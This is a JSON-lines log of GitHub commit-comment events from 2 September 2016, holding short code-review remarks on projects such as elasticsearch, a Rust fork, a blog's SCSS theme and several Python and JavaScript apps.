{"id":"4509169165","type":"CommitCommentEvent","actor":{"login":"bleskes"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":18882130,"position":6,"line":299,"path":"core/src/test/java/org/elasticsearch/index/replication/ESIndexLevelReplicationTestCase.java","commit_id":"8b967765031e3ef8759c5573a6d26ff4582ecd31","created_at":"2016-09-02T15:30:02Z","updated_at":"2016-09-02T15:30:02Z","body":"we should use this in startAll()"}},"created_at":"2016-09-02T15:30:02Z"}
{"id":"4509179595","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882146,"position":11,"line":6626,"path":"content/themes/enhancv/assets/css/bastard.css","commit_id":"cd5996e215e7bf69e4b4614afccf1626020507b7","created_at":"2016-09-02T15:31:57Z","updated_at":"2016-09-02T15:31:57Z","body":"Just write #333 it is shorter"}},"created_at":"2016-09-02T15:31:57Z"}
{"id":"4509183807","type":"CommitCommentEvent","actor":{"login":"raojianxiong"},"repo":{"name":"raojianxiong/AndroidQuestionBank"},"payload":{"comment":{"id":18882154,"position":null,"line":null,"path":null,"commit_id":"b7b537cb29d28ae3026bc9eae47699276374d25b","created_at":"2016-09-02T15:32:46Z","updated_at":"2016-09-02T15:32:46Z","body":"+# AndroidQuestionBank\r\n+this is the first smll project in september."}},"created_at":"2016-09-02T15:32:46Z"}
{"id":"4509184674","type":"CommitCommentEvent","actor":{"login":"raojianxiong"},"repo":{"name":"raojianxiong/AndroidQuestionBank"},"payload":{"comment":{"id":18882158,"position":null,"line":null,"path":null,"commit_id":"b7b537cb29d28ae3026bc9eae47699276374d25b","created_at":"2016-09-02T15:32:55Z","updated_at":"2016-09-02T15:32:55Z","body":"+# AndroidQuestionBank\r\n+this is the first small project in september."}},"created_at":"2016-09-02T15:32:55Z"}
{"id":"4509185323","type":"CommitCommentEvent","actor":{"login":"loosebazooka"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":18882160,"position":null,"line":null,"path":null,"commit_id":"786786290255c3ea460ad19b9723f49af52d0336","created_at":"2016-09-02T15:33:03Z","updated_at":"2016-09-02T15:33:03Z","body":":ship:"}},"created_at":"2016-09-02T15:33:03Z"}
{"id":"4509185666","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18882161,"position":20,"line":42,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-02T15:33:07Z","updated_at":"2016-09-02T15:33:07Z","body":"I think this is backwards; we really want it to be a `Vec`, indexed by the **old** crate numbers (from previous compilation). These are the crate numbers in `paths`."}},"created_at":"2016-09-02T15:33:07Z"}
{"id":"4509188432","type":"CommitCommentEvent","actor":{"login":"vipero07"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18882168,"position":362,"line":623,"path":"pokemongo_bot/__init__.py","commit_id":"838fea4298b79acfac07447d8328a4672b583667","created_at":"2016-09-02T15:33:33Z","updated_at":"2016-09-02T15:33:33Z","body":"Missing a close parenthesis? This build is broken."}},"created_at":"2016-09-02T15:33:33Z"}
{"id":"4509195530","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882184,"position":32,"line":228,"path":"content/themes/enhancv/assets/sass/partials/_general.scss","commit_id":"fb7f5dd28c4f01d75134d852cc118d24a990b87d","created_at":"2016-09-02T15:34:48Z","updated_at":"2016-09-02T15:34:48Z","body":"These lines are unneeded just write liner-gradient because you have autoprefixer in this project"}},"created_at":"2016-09-02T15:34:48Z"}
{"id":"4509196129","type":"CommitCommentEvent","actor":{"login":"Shamauk"},"repo":{"name":"Shamauk/Atomic-Test-001"},"payload":{"comment":{"id":18882186,"position":3,"line":2,"path":"README.md","commit_id":"a214c11baffe048d5ebc873a53837dacd5925ca1","created_at":"2016-09-02T15:34:55Z","updated_at":"2016-09-02T15:34:55Z","body":"Update 0.012"}},"created_at":"2016-09-02T15:34:55Z"}
{"id":"4509197800","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882188,"position":35,"line":231,"path":"content/themes/enhancv/assets/sass/partials/_general.scss","commit_id":"fb7f5dd28c4f01d75134d852cc118d24a990b87d","created_at":"2016-09-02T15:35:14Z","updated_at":"2016-09-02T15:35:14Z","body":"Same as above"}},"created_at":"2016-09-02T15:35:14Z"}
{"id":"4509202341","type":"CommitCommentEvent","actor":{"login":"wollirama"},"repo":{"name":"Nader-Sl/Hackemon"},"payload":{"comment":{"id":18882198,"position":null,"line":null,"path":null,"commit_id":"523dd6058d780618dfb82a13a552e839dfd4c7d8","created_at":"2016-09-02T15:36:02Z","updated_at":"2016-09-02T15:36:02Z","body":"Hackemon V 1.62 "}},"created_at":"2016-09-02T15:36:02Z"}
{"id":"4509204609","type":"CommitCommentEvent","actor":{"login":"Parthimosm"},"repo":{"name":"Parthimosm/Test"},"payload":{"comment":{"id":18882205,"position":3,"line":3,"path":"README.md","commit_id":"aa2dcf0c0375960fff12a412803f85e0f200fea5","created_at":"2016-09-02T15:36:28Z","updated_at":"2016-09-02T15:36:28Z","body":"TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST"}},"created_at":"2016-09-02T15:36:28Z"}
{"id":"4509208992","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18882213,"position":77,"line":77,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-02T15:37:16Z","updated_at":"2016-09-02T15:37:16Z","body":"This doesn't feel right. Isn't `path.krate` one of the *old* crate numbers? In that case, I don't think it should ever be related to `max_current_crate`.\r\n\r\nI think we need to change the hashmap back to a vec (as noted above), but construct the hashmap from string -> crate-num for the **current** set of traces. This map can be given to `retrace` as a parameter (let's call it `new_krates: &HashMap<String, ast::CrateNum>`).\r\n\r\nNow, the code here can be something like:\r\n\r\n```\r\nassert!(path.krate < self.krates.len());\r\nlet old_crate_key = &self.krates[path.krate as usize];\r\nlet new_crate_key = new_krates[old_crate_key];\r\ntcx.retrace_path(new_crate_key, &path.data);\r\n```\r\n\r\n(It's not crucial, note, that it be a vec, and not a hashmap. The main thing is that we need to do the map in the other direction.)"}},"created_at":"2016-09-02T15:37:16Z"}
{"id":"4509218049","type":"CommitCommentEvent","actor":{"login":"zaharovklim"},"repo":{"name":"zaharovklim/tkt"},"payload":{"comment":{"id":18882231,"position":213,"line":293,"path":"backend/apps/api/views.py","commit_id":"5ed8f8e963bbf190334331bc9e13f96a7057a969","created_at":"2016-09-02T15:38:55Z","updated_at":"2016-09-02T15:38:55Z","body":"Кажется, здесь слишком длинная строка. Настрой плиз IDE, чтобы она такие вещи подсвечивала."}},"created_at":"2016-09-02T15:38:55Z"}
{"id":"4509218959","type":"CommitCommentEvent","actor":{"login":"bholl"},"repo":{"name":"glencoesoftware/bioformats"},"payload":{"comment":{"id":18882234,"position":null,"line":null,"path":null,"commit_id":"dae6b6646df5e0da40ddb488b1bdc9089223955f","created_at":"2016-09-02T15:39:05Z","updated_at":"2016-09-02T15:39:05Z","body":"looks good :)"}},"created_at":"2016-09-02T15:39:05Z"}
{"id":"4509219122","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882236,"position":10,"line":86,"path":"content/themes/enhancv/assets/sass/partials/_mediaqueries.scss","commit_id":"d9874b49de3ac73d174ecb6dfecb53d9be1a9c73","created_at":"2016-09-02T15:39:08Z","updated_at":"2016-09-02T15:39:08Z","body":"This is a big NO. Bootstrap has special variables in _variables.scss for max-with and min-width media queries: $screen-xs-max, $screen-md-max $screen-sm-max and etc. and $screen-xs-min, $screen-md-min etc. You must use them to avoid 1px overlap on some edge resolutions like 768px for example. Use them everywhere. This must be chnaged to avoid design problems."}},"created_at":"2016-09-02T15:39:08Z"}
{"id":"4509223021","type":"CommitCommentEvent","actor":{"login":"bholl"},"repo":{"name":"glencoesoftware/bioformats"},"payload":{"comment":{"id":18882248,"position":null,"line":null,"path":null,"commit_id":"eb3025bc4796988090b847ec7fb5e4786adbb284","created_at":"2016-09-02T15:39:51Z","updated_at":"2016-09-02T15:39:51Z","body":":+1: "}},"created_at":"2016-09-02T15:39:51Z"}
{"id":"4509223573","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882249,"position":24,"line":107,"path":"content/themes/enhancv/assets/sass/partials/_mediaqueries.scss","commit_id":"d9874b49de3ac73d174ecb6dfecb53d9be1a9c73","created_at":"2016-09-02T15:39:57Z","updated_at":"2016-09-02T15:39:57Z","body":"Avoid custom media query widths if possible everywhere"}},"created_at":"2016-09-02T15:39:57Z"}
{"id":"4509226637","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"particlebanana/machinepack-mailgun"},"payload":{"comment":{"id":18882254,"position":13,"line":108,"path":"machines/send-html-email.js","commit_id":"7cc71ea39ae12da9a8d4fdaef04ba959b286fa7b","created_at":"2016-09-02T15:40:33Z","updated_at":"2016-09-02T15:40:33Z","body":"@sgress454 Actually... we could make this depend on the `sails` habitat and just bake in the `sails.config.environment !== 'production'` check.  It's more opinionated, but might actually be better.  It's certainly less work to deal with."}},"created_at":"2016-09-02T15:40:33Z"}
{"id":"4509227152","type":"CommitCommentEvent","actor":{"login":"zaharovklim"},"repo":{"name":"zaharovklim/tkt"},"payload":{"comment":{"id":18882256,"position":220,"line":300,"path":"backend/apps/api/views.py","commit_id":"5ed8f8e963bbf190334331bc9e13f96a7057a969","created_at":"2016-09-02T15:40:38Z","updated_at":"2016-09-02T15:40:38Z","body":"Отладочный вывод стоит убрать."}},"created_at":"2016-09-02T15:40:38Z"}
{"id":"4509228203","type":"CommitCommentEvent","actor":{"login":"adrianrossing"},"repo":{"name":"adrianrossing/magnumChorumUi"},"payload":{"comment":{"id":18882257,"position":5,"line":21,"path":"conf/webpack-dist.conf.js","commit_id":"2e228a8c2548242b222808e60a0babfb2eae47ef","created_at":"2016-09-02T15:40:51Z","updated_at":"2016-09-02T15:40:51Z","body":"consider the following --> \r\nloaders: ['to-string-loader', 'css-loader']\r\nhttps://github.com/webpack/style-loader/issues/123"}},"created_at":"2016-09-02T15:40:51Z"}
{"id":"4509229678","type":"CommitCommentEvent","actor":{"login":"zoomwebstudio"},"repo":{"name":"olefredrik/FoundationPress"},"payload":{"comment":{"id":18882258,"position":16,"line":16,"path":".babelrc","commit_id":"9e83b23b346675afa5dc0e2a5d34e8b07fd28bc1","created_at":"2016-09-02T15:41:09Z","updated_at":"2016-09-02T15:41:09Z","body":"Hdsnkottfeshbiod\n\nLe 2 sept. 2016 14:59, \"Adrian Bengtson\" <notifications@github.com> a\nécrit :\n>\n> @colin-marshall I'm curious about this compact set to false, is it better\nthan default for FoundationPress?\n>f33%%2%$$22%$$2%\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2016-09-02T15:41:09Z"}
{"id":"4509230463","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"particlebanana/machinepack-mailgun"},"payload":{"comment":{"id":18882260,"position":13,"line":108,"path":"machines/send-html-email.js","commit_id":"7cc71ea39ae12da9a8d4fdaef04ba959b286fa7b","created_at":"2016-09-02T15:41:18Z","updated_at":"2016-09-02T15:41:18Z","body":"(and mp-mailgun is only included in sails-stdlib -- for Sails.js apps-- so I think it'd be safe)"}},"created_at":"2016-09-02T15:41:18Z"}
{"id":"4509231054","type":"CommitCommentEvent","actor":{"login":"bholl"},"repo":{"name":"glencoesoftware/bioformats"},"payload":{"comment":{"id":18882262,"position":null,"line":null,"path":null,"commit_id":"41f6b6b82f9f71d7f0fc1284f721133837bd848d","created_at":"2016-09-02T15:41:25Z","updated_at":"2016-09-02T15:41:25Z","body":"thanks, looks better :)"}},"created_at":"2016-09-02T15:41:25Z"}
{"id":"4509231124","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882263,"position":17,"line":29,"path":"content/themes/enhancv/assets/sass/partials/_singlepost.scss","commit_id":"c4ccdbc75729ad3880194a7d2460f9677106c46b","created_at":"2016-09-02T15:41:25Z","updated_at":"2016-09-02T15:41:25Z","body":"Just use padding property and define all values for each side there"}},"created_at":"2016-09-02T15:41:25Z"}
{"id":"4509231373","type":"CommitCommentEvent","actor":{"login":"giorgiosaud"},"repo":{"name":"giorgiosaud/bootstrapper"},"payload":{"comment":{"id":18882264,"position":null,"line":null,"path":null,"commit_id":"f18772bdbe56e5fae5fd22555968e42be9abe000","created_at":"2016-09-02T15:41:28Z","updated_at":"2016-09-02T15:41:28Z","body":"Please delete this line to make the Form::open work with method not Get"}},"created_at":"2016-09-02T15:41:28Z"}
{"id":"4509237098","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882278,"position":16,"line":7381,"path":"content/themes/enhancv/assets/css/bastard.css","commit_id":"c4ccdbc75729ad3880194a7d2460f9677106c46b","created_at":"2016-09-02T15:42:33Z","updated_at":"2016-09-02T15:42:33Z","body":"Use padding shorthand property"}},"created_at":"2016-09-02T15:42:33Z"}
{"id":"4509237249","type":"CommitCommentEvent","actor":{"login":"adrianrossing"},"repo":{"name":"adrianrossing/magnumChorumUi"},"payload":{"comment":{"id":18882279,"position":5,"line":21,"path":"conf/webpack-dist.conf.js","commit_id":"2e228a8c2548242b222808e60a0babfb2eae47ef","created_at":"2016-09-02T15:42:35Z","updated_at":"2016-09-02T15:42:35Z","body":"Or... why not just a single loader. That might make sense...\r\n   loader: 'style-loader!css-loader!stylus-loader'"}},"created_at":"2016-09-02T15:42:35Z"}
{"id":"4509241340","type":"CommitCommentEvent","actor":{"login":"zaharovklim"},"repo":{"name":"zaharovklim/tkt"},"payload":{"comment":{"id":18882286,"position":7,"line":168,"path":"backend/conf/settings.py","commit_id":"5ed8f8e963bbf190334331bc9e13f96a7057a969","created_at":"2016-09-02T15:43:23Z","updated_at":"2016-09-02T15:43:23Z","body":"Здесь используется константа MAILCHIMP_API_KEY и при отправке запроса тоже она передается в параметрах auth. Действительно, необходимо передавать ее в url и в параметрах auth?"}},"created_at":"2016-09-02T15:43:23Z"}
{"id":"4509243141","type":"CommitCommentEvent","actor":{"login":"urshofer"},"repo":{"name":"Rokfor/rokfor-slim"},"payload":{"comment":{"id":18882296,"position":null,"line":null,"path":null,"commit_id":"0724e2a940b047516a64c3ab6ac8d3d2500531c5","created_at":"2016-09-02T15:43:45Z","updated_at":"2016-09-02T15:43:45Z","body":"__API Description file syntax error on line 94__: base type 'String' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-02T15:43:45Z"}
{"id":"4509245047","type":"CommitCommentEvent","actor":{"login":"adrianrossing"},"repo":{"name":"adrianrossing/magnumChorumUi"},"payload":{"comment":{"id":18882300,"position":5,"line":21,"path":"conf/webpack-dist.conf.js","commit_id":"2e228a8c2548242b222808e60a0babfb2eae47ef","created_at":"2016-09-02T15:44:10Z","updated_at":"2016-09-02T15:44:10Z","body":"finally... (from same url)\r\n\r\nI started with WebPack Sample here: https://angular.io/docs/ts/latest/guide/webpack.html\r\n\r\nAdded to-string-loader dependency here -> https://github.com/gajus/to-string-loader\r\n\r\nIn my wepback.common.js file I added the loader:\r\n\r\n{\r\ntest: /.css$/,\r\nexclude: helpers.root('src', 'app'),\r\nloaders:[ExtractTextPlugin.extract('style', 'css-loader'), 'to-string', 'css']\r\n},"}},"created_at":"2016-09-02T15:44:10Z"}
{"id":"4509245802","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882304,"position":23,"line":154,"path":"content/themes/enhancv/assets/sass/partials/_singlepost.scss","commit_id":"dd09b3d9997c2b84cfac4e4992b999efb7d1c848","created_at":"2016-09-02T15:44:18Z","updated_at":"2016-09-02T15:44:18Z","body":"Always define a value for :focus and :active states for links as well when you define :hover!!!"}},"created_at":"2016-09-02T15:44:18Z"}
{"id":"4509248814","type":"CommitCommentEvent","actor":{"login":"zaharovklim"},"repo":{"name":"zaharovklim/tkt"},"payload":{"comment":{"id":18882313,"position":9,"line":24,"path":"backend/requirements.txt","commit_id":"5ed8f8e963bbf190334331bc9e13f96a7057a969","created_at":"2016-09-02T15:44:53Z","updated_at":"2016-09-02T15:44:53Z","body":"Закомментированные библиотеки нужно выпилить."}},"created_at":"2016-09-02T15:44:53Z"}
{"id":"4509251261","type":"CommitCommentEvent","actor":{"login":"ukleles"},"repo":{"name":"ukleles/Monthly_Summary_Eight"},"payload":{"comment":{"id":18882317,"position":3,"line":3,"path":"README.md","commit_id":"a6cbfe021acaaf8d3548815b52fe0f034192aa43","created_at":"2016-09-02T15:45:20Z","updated_at":"2016-09-02T15:45:20Z","body":"八月的总结\r\n一。工作效率\r\n二。收获的知识\r\n三。次月目标\r\n"}},"created_at":"2016-09-02T15:45:20Z"}
{"id":"4509253405","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882325,"position":36,"line":215,"path":"content/themes/enhancv/assets/sass/partials/_singlepost.scss","commit_id":"dd09b3d9997c2b84cfac4e4992b999efb7d1c848","created_at":"2016-09-02T15:45:43Z","updated_at":"2016-09-02T15:45:43Z","body":"This is a big NO. Don't overwrite bootstrap styles that can be configured with the bootstrap variables in _variables.scss unless it is absolutely necessary!"}},"created_at":"2016-09-02T15:45:43Z"}
{"id":"4509254665","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18882328,"position":null,"line":null,"path":null,"commit_id":"e344f54712750302d19fe4e93aedd10f2e3f2003","created_at":"2016-09-02T15:45:58Z","updated_at":"2016-09-02T15:45:58Z","body":"Tuning this many parameters at high throughput overloads the framework causing many machines to crash."}},"created_at":"2016-09-02T15:45:58Z"}
{"id":"4509259761","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882338,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:46:59Z","updated_at":"2016-09-02T15:46:59Z","body":"Нет\r\n"}},"created_at":"2016-09-02T15:46:59Z"}
{"id":"4509260222","type":"CommitCommentEvent","actor":{"login":"gthomas2"},"repo":{"name":"POETGroup/moodle-filter_oembed"},"payload":{"comment":{"id":18882339,"position":74,"line":74,"path":"templates/managementpage.mustache","commit_id":"67262bb7cd543cf969ff379f042321ab8000efb8","created_at":"2016-09-02T15:47:05Z","updated_at":"2016-09-02T15:47:05Z","body":"The actions are just urls here?  Is the idea to add in a partial to convert them to links or buttons?"}},"created_at":"2016-09-02T15:47:05Z"}
{"id":"4509261299","type":"CommitCommentEvent","actor":{"login":"legoboyvdlp"},"repo":{"name":"legoboyvdlp/737-800"},"payload":{"comment":{"id":18882344,"position":null,"line":null,"path":null,"commit_id":"7d122a1d8310907f3bdc1a1a349403fe1022d806","created_at":"2016-09-02T15:47:16Z","updated_at":"2016-09-02T15:47:16Z","body":"Sorry, Soitanen, it ought not to do that...\r\nAny other comments?"}},"created_at":"2016-09-02T15:47:16Z"}
{"id":"4509263120","type":"CommitCommentEvent","actor":{"login":"sirotama"},"repo":{"name":"Moffkey/Moff"},"payload":{"comment":{"id":18882348,"position":null,"line":null,"path":null,"commit_id":"ec005c683b167481a1817d3ea9ca67e413d20c91","created_at":"2016-09-02T15:47:37Z","updated_at":"2016-09-02T15:47:37Z","body":"MY_Controllerにこれおいてるとevent/detailはログイン不要で見れるようにしたいのにevent/createはログイン必要とかの処理が出来ないので\r\nMY_ModelかMY_Controllerに$this->require_login();作る予定\r\n"}},"created_at":"2016-09-02T15:47:37Z"}
{"id":"4509263408","type":"CommitCommentEvent","actor":{"login":"nkovshov"},"repo":{"name":"nkovshov/django-trello-webhooks"},"payload":{"comment":{"id":18882349,"position":1,"line":1,"path":"requirements.txt","commit_id":"6cc3802e2c5aea64c9844cb44ada501c500ace75","created_at":"2016-09-02T15:47:40Z","updated_at":"2016-09-02T15:47:40Z","body":"I'm not sure that it's need to remove Django requirement or set on more broader version number like `Django>=1.7.1<1.10`. \r\nAs far as I can remember most Django packages doesn't include Django version to requirements"}},"created_at":"2016-09-02T15:47:40Z"}
{"id":"4509265407","type":"CommitCommentEvent","actor":{"login":"eighteyes"},"repo":{"name":"matrix-io/matrix-cli"},"payload":{"comment":{"id":18882354,"position":61,"line":209,"path":"bin/matrix-sim.js","commit_id":"4f4388be05cfe627142d3e5a5541bfbaae29cd39","created_at":"2016-09-02T15:48:03Z","updated_at":"2016-09-02T15:48:03Z","body":"Much better\r\nU"}},"created_at":"2016-09-02T15:48:03Z"}
{"id":"4509266543","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882357,"position":14,"line":30,"path":"content/themes/enhancv/assets/sass/partials/_singlepost.scss","commit_id":"5d6c20a4ae41ebb56e2da730b9b80c5c3e3d2a51","created_at":"2016-09-02T15:48:16Z","updated_at":"2016-09-02T15:48:16Z","body":"Overwriting deafult bootstrap styles here. Is it absolutely necessary. Can the changes be more global. You overwrite bootstrap styles in almost every single different .scss file which is wrong."}},"created_at":"2016-09-02T15:48:16Z"}
{"id":"4509270358","type":"CommitCommentEvent","actor":{"login":"mstevetodd"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18882367,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-02T15:49:04Z","updated_at":"2016-09-02T15:49:04Z","body":"I figured out how to rearrange the jars in the classpath, so that I'm now getting CheckForNull from jsr305.jar, but I get the exact same error message in the editor."}},"created_at":"2016-09-02T15:49:04Z"}
{"id":"4509270599","type":"CommitCommentEvent","actor":{"login":"gthomas2"},"repo":{"name":"POETGroup/moodle-filter_oembed"},"payload":{"comment":{"id":18882368,"position":null,"line":null,"path":null,"commit_id":"67262bb7cd543cf969ff379f042321ab8000efb8","created_at":"2016-09-02T15:49:07Z","updated_at":"2016-09-02T15:49:07Z","body":"Nice work - renderable and mustache templates!"}},"created_at":"2016-09-02T15:49:07Z"}
{"id":"4509270738","type":"CommitCommentEvent","actor":{"login":"eighteyes"},"repo":{"name":"matrix-io/matrix-cli"},"payload":{"comment":{"id":18882369,"position":null,"line":null,"path":null,"commit_id":"4f4388be05cfe627142d3e5a5541bfbaae29cd39","created_at":"2016-09-02T15:49:09Z","updated_at":"2016-09-02T15:49:09Z","body":"Looks good! I'll test"}},"created_at":"2016-09-02T15:49:09Z"}
{"id":"4509270779","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18882370,"position":null,"line":null,"path":null,"commit_id":"528560ebb2286642f23f63008538ad6fcc660264","created_at":"2016-09-02T15:49:10Z","updated_at":"2016-09-02T15:49:10Z","body":"git reset this, only media path needs /default"}},"created_at":"2016-09-02T15:49:10Z"}
{"id":"4509276573","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882383,"position":13,"line":68,"path":"content/themes/enhancv/assets/sass/partials/_navigation.scss","commit_id":"b8a0d69c9e6fe0e6bfca84f08ac9b6776de2d2ef","created_at":"2016-09-02T15:50:19Z","updated_at":"2016-09-02T15:50:19Z","body":"Someplaces you are using rems somewhere px. This is not fine. Do it either in px everywhere or rems everywhere."}},"created_at":"2016-09-02T15:50:19Z"}
{"id":"4509278860","type":"CommitCommentEvent","actor":{"login":"aafemt"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18882385,"position":null,"line":null,"path":null,"commit_id":"a23cfb090d09da876f3ef32b6007ef57a9dbaaa3","created_at":"2016-09-02T15:50:43Z","updated_at":"2016-09-02T15:50:43Z","body":"You forgot move semantic that was agreed to be allowed."}},"created_at":"2016-09-02T15:50:43Z"}
{"id":"4509279132","type":"CommitCommentEvent","actor":{"login":"blowmage"},"repo":{"name":"google/google-api-ruby-client"},"payload":{"comment":{"id":18882386,"position":null,"line":null,"path":null,"commit_id":"2046e00f14d2924880782dcb6537fad1a7f3fc05","created_at":"2016-09-02T15:50:47Z","updated_at":"2016-09-02T15:50:47Z","body":"❤️ "}},"created_at":"2016-09-02T15:50:47Z"}
{"id":"4509279536","type":"CommitCommentEvent","actor":{"login":"gthomas2"},"repo":{"name":"POETGroup/moodle-filter_oembed"},"payload":{"comment":{"id":18882388,"position":25,"line":25,"path":"db/subplugins.php","commit_id":"671f3fc9b87b4590fe597471c8eaddd15c960c95","created_at":"2016-09-02T15:50:52Z","updated_at":"2016-09-02T15:50:52Z","body":"Could this cause issues?\r\nA sub plugin should be able to have its own classes folder and autoloading so having it already inside a classes folder might cause problems."}},"created_at":"2016-09-02T15:50:52Z"}
{"id":"4509281528","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18882390,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T15:51:15Z","updated_at":"2016-09-02T15:51:15Z","body":"FixCentroidForNonconvex (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T15:51:15Z"}
{"id":"4509281841","type":"CommitCommentEvent","actor":{"login":"andersonfrailey"},"repo":{"name":"andersonfrailey/hello-world"},"payload":{"comment":{"id":18882392,"position":null,"line":null,"path":null,"commit_id":"d6dd8c46e9de7e0450b12e4e78910a0bf04db077","created_at":"2016-09-02T15:51:18Z","updated_at":"2016-09-02T15:51:18Z","body":"This is to address issue #862. \r\n\r\nEstimated revenue effects of implementing the FST from the OSPC model and other sources are below (billions of dollars):\r\n| Model                                          |  2016  |  2017  |  2018  |  2019  |  2020  |  2021  |\r\n| :-----------------------------: | :------: | :------: | :------: | :------: | :------: | :------: |\r\n|  TPC                                            |    2.2     |     2.4    |     4.7    |    10.2   |    12.5    |    12.8   |\r\n| Treasury (2016)                         |    6.7     |     -93   |     1.2     |     2.8    |     3.7    |    3.9     |   \r\n| Treasury (2017)                         |     0.0    |      7.8    |    -62    |      1.3    |    3.1     |    4.0     | \r\n| Joint Committee on Taxation   |    4.8     |     5.3    |    5.7     |      6.1    |     6.4    |    6.7     |\r\n| OSPC                                         |    4.0     |     4.3    |    4.7     |      5.2    |    5.7     |    6.3     |\r\n"}},"created_at":"2016-09-02T15:51:18Z"}
{"id":"4509282539","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882395,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:51:26Z","updated_at":"2016-09-02T15:51:26Z","body":"а если \"abcdef \"?"}},"created_at":"2016-09-02T15:51:26Z"}
{"id":"4509283867","type":"CommitCommentEvent","actor":{"login":"blowmage"},"repo":{"name":"google/google-api-ruby-client"},"payload":{"comment":{"id":18882397,"position":null,"line":null,"path":null,"commit_id":"39d0a164b575e248024f70ea643dbb030ee0f7b8","created_at":"2016-09-02T15:51:42Z","updated_at":"2016-09-02T15:51:42Z","body":"❤️ "}},"created_at":"2016-09-02T15:51:42Z"}
{"id":"4509286214","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882405,"position":52,"line":25,"path":"content/themes/enhancv/assets/sass/partials/_singlepost.scss","commit_id":"bd72c66f74a258b3b9ab084da4243fc12b6f1aaf","created_at":"2016-09-02T15:52:10Z","updated_at":"2016-09-02T15:52:10Z","body":"Is this necesarry? There are bootstrap variables for different line-heights. Check there first!"}},"created_at":"2016-09-02T15:52:10Z"}
